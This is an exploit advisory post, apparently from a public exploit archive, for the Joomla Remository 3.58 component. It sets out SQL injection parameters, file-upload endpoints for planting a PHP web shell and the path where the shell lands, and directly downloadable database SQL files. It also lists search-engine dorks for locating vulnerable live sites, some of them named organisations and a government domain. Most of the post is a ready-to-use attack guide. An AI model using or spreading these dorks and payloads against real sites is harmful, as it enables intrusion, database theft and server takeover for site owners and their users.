#################################################################### # Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 30/01/2019 # Vendor Homepage : remository.com # Software Download Link : remository.com/downloads/joomla-3.x-software/ # Software Information Link : extensions.joomla.org/extension/remository/ # Software Version : 3.58 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_remository'' inurl:''/administrator/components/com_remository/'' intext:Site Designed By Conservation Designs intext:CCCV Gabriel Valencia site:gob.ec intext:Web creada por softdream.es intext:Sponsored by Innovatron - Managed by Spirtech intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates intext:Web design by Mercury Web Solutions intext:Joomla 2.5 Templates Designed by Joomla Templates Free. intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V. # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-200 [ Information Exposure ] CWE-434 [ Unrestricted Upload of File with Dangerous Type ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : cxsecurity.com/issue/WLB-2019010284 packetstormsecurity.com/files/151433/Joomla-Remository-3.58-Database-Disclosure-Shell-Upload-SQL-Injection.html #################################################################### # Description about Software : *************************** “Remository” is open source software for Joomla. #################################################################### # Impact : *********** *Attackers can exploit this issue via a browser. The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files/shell upload because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. * An attacker might be able inject and/or alter existing SQL statements which would influence the database exchange. * SQL injection vulnerability in the Joomla Remository Components 3.58 because, it fails to sufficiently sanitize user-supplied data before using it in an SQL query. * Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read & write access to the filesystem may be possible. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_remository&Itemid=[SQL Injection] /index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id= [ID-NUMBER]&orderby=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id= [ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection] /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id= [ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection] #################################################################### # Arbitrary File Upload Exploit : **************************** /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles /index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR] /index.php/shared-file-repository/func-addmanyfiles/ Directory File Path : ****************** Search your file here. /components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php /components/com_remository_files/...... Note : If websites are not vulnerable it says ; You have no permitted upload categories - please refer to the webmaster #################################################################### # Database Disclosure Exploit : *************************** /administrator/components/com_remository/assignment.sql /administrator/components/com_remository/blob.sql /administrator/components/com_remository/containers.sql /administrator/components/com_remository/file.sql /administrator/components/com_remository/log.sql /administrator/components/com_remository/permission.sql /administrator/components/com_remository/repository.sql /administrator/components/com_remository/reviews.sql /administrator/components/com_remository/structure.sql /administrator/components/com_remository/text.sql #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################